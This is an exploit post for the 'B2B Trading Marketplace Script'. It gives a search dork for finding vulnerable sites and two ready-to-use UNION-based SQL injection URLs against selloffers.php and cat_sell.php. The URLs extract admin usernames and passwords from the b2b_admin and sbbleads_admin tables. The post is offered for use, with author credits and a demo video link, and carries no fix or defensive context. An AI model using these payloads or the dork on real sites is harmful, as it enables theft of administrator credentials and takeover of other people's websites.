25 lines
No EOL
905 B
Text
25 lines
No EOL
905 B
Text
[+] B2B Trading Marketplace SQL Injection Vulnerability
|
|
|
|
[+] Software : B2B Trading Marketplace Script
|
|
[+] Author : AnGrY BoY
|
|
[+] Contact : h4kurd@hotmail.com & h4kurd@yahoo.com
|
|
[+] Home : http://www.kurd-security.com http://www.h4kurd.com
|
|
=====================================================================================
|
|
|
|
|
|
[+] Dork : cat_sell.php?cid= or selloffers.php?cid=
|
|
|
|
|
|
[+]expolit:
|
|
|
|
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--
|
|
|
|
or
|
|
|
|
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--
|
|
|
|
|
|
[+] example
|
|
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
|
|
======================================================================================
|
|
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members |